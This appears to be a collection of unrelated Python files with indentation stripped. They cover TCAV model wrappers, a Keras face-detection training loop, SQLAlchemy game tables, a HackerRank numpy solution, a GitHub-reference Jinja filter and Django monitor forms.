class InceptionV3Wrapper_public(PublicImageModelWrapper):
def __init__(self, sess, model_saved_path, labels_path):
self.image_value_range = (-1, 1)
image_shape_v3 = [299, 299, 3]
endpoints_v3 = dict(
input='Mul:0',
logit='softmax/logits:0',
prediction='softmax:0',
pre_avgpool='mixed_10/join:0',
logit_weight='softmax/weights:0',
logit_bias='softmax/biases:0',
)
self.sess = sess
super(InceptionV3Wrapper_public, self).__init__(
sess,
model_saved_path,
labels_path,
image_shape_v3,
endpoints_v3,
scope='v3')
self.model_name = 'InceptionV3_public'
class MobilenetV2Wrapper_public(PublicImageModelWrapper):
def __init__(self, sess, model_saved_path, labels_path):
self.image_value_range = (-1, 1)
image_shape_v2 = [224, 224, 3]
endpoints_v2 = dict(
input='input:0',
prediction='MobilenetV2/Predictions/Reshape:0',
)
self.sess = sess
super(MobilenetV2Wrapper_public, self).__init__(
sess,
model_saved_path,
labels_path,
image_shape_v2,
endpoints_v2,
scope='MobilenetV2')
# define bottleneck tensors and their gradients
self.bottlenecks_tensors = self.get_bottleneck_tensors_mobilenet(
scope='MobilenetV2')
# Construct gradient ops.
g = tf.compat.v1.get_default_graph()
self._make_gradient_tensors()
self.model_name = 'MobilenetV2_public'
@staticmethod
def get_bottleneck_tensors_mobilenet(scope):
"""Add Inception bottlenecks and their pre-Relu versions to endpoints dict."""
graph = tf.compat.v1.get_default_graph()
bn_endpoints = {}
for op in graph.get_operations():
if 'add' in op.name and 'gradients' not in op.name and 'add' == op.name.split(
'/')[-1]:
name = op.name.split('/')[-2]
bn_endpoints[name] = op.outputs[0]
return bn_endpoints
class KerasModelWrapper(ModelWrapper):
""" ModelWrapper for keras models
By default, assumes that your model contains one input node, one output head
and one loss function.
Computes gradients of the output layer in respect to a CAV.
Args:
sess: Tensorflow session we will use for TCAV.
model_path: Path to your model.h5 file, containing a saved trained
model.
labels_path: Path to a file containing the labels for your problem. It
requires a .txt file, where every line contains a label for your
model. You want to make sure that the order of labels in this file
matches with the logits layers for your model, such that file[i] ==
model_logits[i]
"""
def __init__(
self,
sess,
model_path,
labels_path,
):
self.sess = sess
super(KerasModelWrapper, self).__init__()
self.import_keras_model(model_path)
self.labels = tf.io.gfile.GFile(labels_path).read().splitlines()
# Construct gradient ops. Defaults to using the model's output layer
self.y_input = tf.compat.v1.placeholder(tf.int64, shape=[None])
self.loss = self.model.loss_functions[0](self.y_input,
self.model.outputs[0])
self._make_gradient_tensors()
def id_to_label(self, idx):
return self.labels[idx]
def label_to_id(self, label):
return self.labels.index(label)
def import_keras_model(self, saved_path):
"""Loads keras model, fetching bottlenecks, inputs and outputs."""
self.ends = {}
self.model = tf.keras.models.load_model(saved_path)
self.get_bottleneck_tensors()
self.get_inputs_and_outputs_and_ends()
def get_bottleneck_tensors(self):
self.bottlenecks_tensors = {}
layers = self.model.layers
for layer in layers:
if 'input' not in layer.name:
self.bottlenecks_tensors[layer.name] = layer.output
def get_inputs_and_outputs_and_ends(self):
self.ends['input'] = self.model.inputs[0]
self.ends['prediction'] = self.model.outputs[0]
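# Minimal usage sketch (illustration only, not part of the original file); the
# file paths and layer/label names below are hypothetical placeholders:
#
#   sess = tf.compat.v1.keras.backend.get_session()
#   wrapper = KerasModelWrapper(sess, '/tmp/my_model.h5', '/tmp/labels.txt')
#   acts = wrapper.run_examples(batch, 'dense_1')   # 'dense_1' must be a layer name
#   grads = wrapper.get_gradient(
#       acts, [wrapper.label_to_id('cat')], 'dense_1', batch)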
|
from keras.layers import Conv2D, Input, MaxPool2D, Reshape, Activation, Flatten, Dense, concatenate
from keras.models import Model, Sequential
from keras.layers.advanced_activations import PReLU
from keras.optimizers import adam
from keras.utils import to_categorical
import matplotlib.pyplot as plt
import numpy as np
import keras.backend as K
import _pickle as pickle
import random
from keras.activations import relu
from keras.losses import mean_squared_error
import tensorflow as tf
import gc
with open(r'24\cls.imdb','rb') as fid:
cls = pickle.load(fid)
with open(r'24\roi.imdb', 'rb') as fid:
roi = pickle.load(fid)
ims_cls = []
ims_roi = []
cls_score = []
roi_score = []
for (idx, dataset) in enumerate(cls) :
ims_cls.append( np.swapaxes(dataset[0],0,2))
cls_score.append(dataset[1])
for (idx,dataset) in enumerate(roi) :
ims_roi.append( np.swapaxes(dataset[0],0,2))
roi_score.append(dataset[2])
ims_cls = np.array(ims_cls)
ims_roi = np.array(ims_roi)
cls_score = np.array(cls_score)
roi_score = np.array(roi_score)
one_hot_labels = to_categorical(cls_score, num_classes=2)
# input = Input(shape = [12,12,3])
input = Input(shape=[24, 24, 3])  # change this shape to [None, None, 3] to allow arbitrary input sizes
x = Conv2D(16,(3,3),strides=1,padding='same',name='conv1')(input)
c1out = PReLU(shared_axes=[1,2],name='prelu1')(x)
c1out = concatenate ([c1out,input],axis=3)
c2input = MaxPool2D(pool_size=3)(c1out)
x = Conv2D(32,(3,3),strides=1,padding='same',name='conv2')(c2input)
c2out = PReLU(shared_axes=[1,2],name='prelu2')(x)
c2out = concatenate([c2out,c2input],axis=3)
c3input = MaxPool2D(pool_size=2)(c2out)
x = Conv2D(64,(3,3),strides=1,padding='same',name='conv3')(c3input)
c3out = PReLU(shared_axes=[1,2],name='prelu3')(x)
c3out = concatenate([c3out,c3input],axis=3)
x = Flatten() (c3out)
x = Dense(128,name='dense1')(x)
x = PReLU(shared_axes=[1],name='prelu4')(x)
classifier = Dense(2, activation='softmax',name='classifier1')(x)
bbox_regress = Dense(4,name='bbox1')(x)
my_adam = adam(lr = 0.001)
for i_train in range(80):
    randx = random.choice([0, 1, 1])  # pick which head to train this cycle (bbox twice as often as the classifier)
# randx = 4
# randx = random.choice([ 4])
batch_size = 64
print ('currently in training macro cycle: ',i_train)
if i_train ==0:
model = Model([input], [classifier, bbox_regress])
# model.load_weights('model24.h5',by_name=True)
bbox = model.get_layer('bbox1')
bbox_weight = bbox.get_weights()
classifier_dense = model.get_layer('classifier1')
cls_weight = classifier_dense.get_weights()
if 0 == randx:
model = Model([input], [classifier])
model.get_layer('classifier1').set_weights(cls_weight)
model.compile(loss='mse', optimizer=my_adam, metrics=["accuracy"])
model.fit(ims_cls, one_hot_labels, batch_size=batch_size, epochs=1)
classifier_softmax = model.get_layer('classifier1')
cls_weight = classifier_softmax.get_weights()
if 1 == randx:
model = Model([input], [bbox_regress])
model.get_layer('bbox1').set_weights(bbox_weight)
model.compile(loss='mse', optimizer=my_adam, metrics=["accuracy"])
model.fit(ims_roi, roi_score, batch_size=batch_size, epochs=1)
bbox_dense = model.get_layer('bbox1')
bbox_weight = bbox_dense.get_weights()
gc.collect()
def savemodel():
model = Model([input], [classifier, bbox_regress])
model.get_layer('bbox1').set_weights(bbox_weight)
model.get_layer('classifier1').set_weights(cls_weight)
model.save_weights('model24.h5')
savemodel()
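# Sketch (an assumption, not part of the original script) of how the weights
# saved by savemodel() could be reloaded later for joint inference:
#
#   infer_model = Model([input], [classifier, bbox_regress])
#   infer_model.load_weights('model24.h5')
#   cls_pred, bbox_pred = infer_model.predict(ims_cls[:8])
#   # cls_pred has shape (8, 2); bbox_pred has shape (8, 4)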
|
import enum
from sqlalchemy import Column, VARCHAR, Integer, Boolean, TIMESTAMP, ForeignKey, CheckConstraint
from sqlalchemy.orm import relationship
from sqlalchemy.sql import func
from sqlalchemy.ext.hybrid import hybrid_property
# local imports
from .base import Base
class GameStatuses(enum.Enum):
"""Holds info about current status"""
ready = 'ready' # App/env started
initiated = 'initiated' # Game initiated
players_decision = 'players_decision' # Players still making card picks
judge_decision = 'judge_decision' # Judge yet to choose winner
end_round = 'end_round' # Round ended
ended = 'ended' # Game ended
class TableGames(Base):
"""games table - stores past game info"""
__tablename__ = 'games'
id = Column(Integer, primary_key=True, autoincrement=True)
rounds = relationship('TableGameRounds', back_populates='game')
start_time = Column(TIMESTAMP, server_default=func.now(), nullable=False)
last_update = Column(TIMESTAMP, onupdate=func.now(), server_default=func.now())
end_time = Column(TIMESTAMP, nullable=True)
@hybrid_property
def duration(self):
return self.end_time - self.start_time if self.end_time is not None else self.last_update - self.start_time
class TableGameRounds(Base):
"""gamerounds table - stores past gameround info"""
__tablename__ = 'gamerounds'
id = Column(Integer, primary_key=True, autoincrement=True)
game_id = Column(Integer, ForeignKey('games.id'), nullable=False)
game = relationship("TableGames", back_populates='rounds')
start_time = Column(TIMESTAMP, server_default=func.now(), nullable=False)
end_time = Column(TIMESTAMP, nullable=True)
@hybrid_property
def duration(self):
return self.end_time - self.start_time if self.end_time is not None else None
class TablePlayerRounds(Base):
"""player-level game info"""
__tablename__ = 'playerrounds'
id = Column(Integer, primary_key=True, autoincrement=True)
player_id = Column(Integer, ForeignKey('players.id'), nullable=False)
player = relationship('TablePlayers', back_populates='rounds')
game_id = Column(Integer, ForeignKey('games.id'), nullable=False)
round_id = Column(Integer, ForeignKey('gamerounds.id'), nullable=False)
score = Column(Integer, default=0, nullable=False)
is_picked = Column(Boolean, default=False, nullable=False)
is_judge = Column(Boolean, default=False, nullable=False)
is_arp = Column(Boolean, default=False, nullable=False)
is_arc = Column(Boolean, default=False, nullable=False)
is_nuked_hand = Column(Boolean, default=False, nullable=False)
is_nuked_hand_caught = Column(Boolean, default=False, nullable=False)
class TableGameSettings(Base):
"""gamesettings table - """
__tablename__ = 'gamesettings'
__table_args__ = (
CheckConstraint('id < 2', name='settings_row_limit1'),
)
id = Column(Integer, primary_key=True, autoincrement=True)
is_ping_winner = Column(Boolean, default=True, nullable=False)
is_ping_judge = Column(Boolean, default=True, nullable=False)
decknuke_penalty = Column(Integer, default=-3, nullable=False)
judge_order_divider = Column(VARCHAR, default=':finger-wag-right:', nullable=False)
last_update = Column(TIMESTAMP, onupdate=func.now())
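# Illustrative sketch (not part of this module) of how these models might be
# used; the engine URL and session setup below are assumptions:
#
#   from sqlalchemy import create_engine
#   from sqlalchemy.orm import sessionmaker
#
#   engine = create_engine('sqlite:///cah.db')   # hypothetical URL
#   Base.metadata.create_all(engine)             # also needs the players table module
#   session = sessionmaker(bind=engine)()
#   game = TableGames()
#   game.rounds.append(TableGameRounds())
#   session.add(game)
#   session.commit()
#   print(game.duration)                         # hybrid_property: last_update - start_time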
|
# Problem: https://www.hackerrank.com/challenges/np-mean-var-and-std/problem
# Score: 20.0
import numpy as np
n,m = map(int, input().split())
my_array = np.array([input().strip().split() for _ in range(n)], int)
print(np.mean(my_array, axis=1), np.var(my_array, axis=0), np.around(np.std(my_array), decimals=11), sep='\n')
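# Worked example (comments only, added for clarity). For the 2x2 input
#   1 2
#   3 4
# the three printed lines are:
#   np.mean(my_array, axis=1) -> [1.5 3.5]   (row means)
#   np.var(my_array, axis=0)  -> [1. 1.]     (column variances)
#   np.std(my_array)          -> 1.11803398875
# (std of the flattened array is sqrt(1.25); it is rounded to 11 decimals,
#  presumably to match the judge's expected output precision)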
|
import re
from moban.plugins.jinja2.extensions import JinjaFilter
GITHUB_REF_PATTERN = "`([^`]*?#[0-9]+)`"
ISSUE = "^.*?" + GITHUB_REF_PATTERN + ".*?$"
SAME_PROJ_FULL_ISSUE = "`#{3} <https://github.com/{0}/{1}/{2}/{3}>`_"
DIFF_PROJ_FULL_ISSUE = "`{1}#{3} <https://github.com/{0}/{1}/{2}/{3}>`_"
PULL_REQUEST = "PR"
PULL = "pull"
ISSUES = "issues"
@JinjaFilter()
def github_expand(line, name, organisation):
    """Expand a backtick-quoted GitHub reference (e.g. ``#123``, ``PR#123`` or
    ``otherproject#123``) found in ``line`` into a full reStructuredText link,
    using ``name`` and ``organisation`` as the current project and owner."""
    result = re.match(ISSUE, line)
if result:
github_thing = result.group(1)
tokens = github_thing.split("#")
if len(tokens) == 4:
if tokens[2] == PULL_REQUEST:
tokens[2] = PULL
else:
tokens[2] = ISSUES
elif len(tokens) == 3:
if tokens[1] == PULL_REQUEST:
tokens = [organisation, tokens[0], PULL, tokens[2]]
else:
tokens = [organisation, tokens[0], ISSUES, tokens[2]]
elif len(tokens) == 2:
if tokens[0] == PULL_REQUEST:
tokens = [organisation, name, PULL] + tokens[1:]
elif tokens[0] != "":
tokens = [organisation, tokens[0], ISSUES] + tokens[1:]
else:
tokens = [organisation, name, ISSUES] + tokens[1:]
if tokens[1] != name:
reference = DIFF_PROJ_FULL_ISSUE.format(*tokens)
else:
reference = SAME_PROJ_FULL_ISSUE.format(*tokens)
return re.sub(GITHUB_REF_PATTERN, reference, line)
else:
return line
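# Illustrative transformations (comments only, with hypothetical project values
# name='myproj', organisation='myorg'):
#
#   github_expand('fixed `#12`', 'myproj', 'myorg')
#     -> 'fixed `#12 <https://github.com/myorg/myproj/issues/12>`_'
#   github_expand('merged `PR#7`', 'myproj', 'myorg')
#     -> 'merged `#7 <https://github.com/myorg/myproj/pull/7>`_'
#   github_expand('see `otherproj#3`', 'myproj', 'myorg')
#     -> 'see `otherproj#3 <https://github.com/myorg/otherproj/issues/3>`_'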
|
# -*- encoding: utf-8 -*-
from django import forms
from camara_zona.models import CamaraZona
from cliente.models import Cliente  # Cliente is used below to build the 'clientes' choices
from instalacion.models import Instalacion
from monitor.models import Monitor
class MonitorForm(forms.ModelForm):
id = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
#camara_serial = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
#zona_numero = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
clientes = forms.ChoiceField(label=u'Clientes')
class Meta:
model = Monitor
fields = '__all__'
def __init__(self, *args, **kwargs):
super(MonitorForm, self).__init__(*args, **kwargs)
instance = getattr(self, 'instance', None)
if instance and instance._id:
self.fields["id"].initial = str(instance._id)
self.fields["clientes"].choices = [(str(c._id), c.razon_social) for c in Cliente.objects.all().filter(cliente_estado=True)]
class MonitorEditarForm(forms.ModelForm):
id = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
id_cliente = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
id_instalacion_s = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
#camara_serial = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
#zona_numero = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
clientes = forms.ChoiceField(label=u'Clientes')
instalaciones = forms.ChoiceField(label=u'Instalaciones')
camaras_zonas = forms.ChoiceField(label=u'Camara Zonas')
class Meta:
model = Monitor
fields = '__all__'
def __init__(self, *args, **kwargs):
super(MonitorEditarForm, self).__init__(*args, **kwargs)
instance = getattr(self, 'instance', None)
if instance and instance._id:
self.fields["id"].initial = str(instance._id)
self.fields["id_cliente"].initial = str(instance.id_instalacion.id_cliente._id)
self.fields["clientes"].choices = [(str(c._id), c.razon_social) for c in Cliente.objects.all().filter(cliente_estado=True)]
self.fields["instalaciones"].choices = [(str(c._id), c.nombre_comercial) for c in Instalacion.objects.all().filter(id_cliente=instance.id_instalacion.id_cliente._id, instalacion_estado=True)]
self.fields["camaras_zonas"].choices = [(str(c._id), c.id_camara_zona) for c in CamaraZona.objects.all().filter(id_instalacion=instance.id_instalacion._id, camara_zona_estado=True)]
class MonitorShowForm(forms.ModelForm):
personas = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
class Meta:
model = Monitor
fields = "__all__"
def __init__(self, *args, **kwargs):
super(MonitorShowForm, self).__init__(*args, **kwargs)
instance = getattr(self, 'instance', None)
self.fields["personas"].initial = "10"
|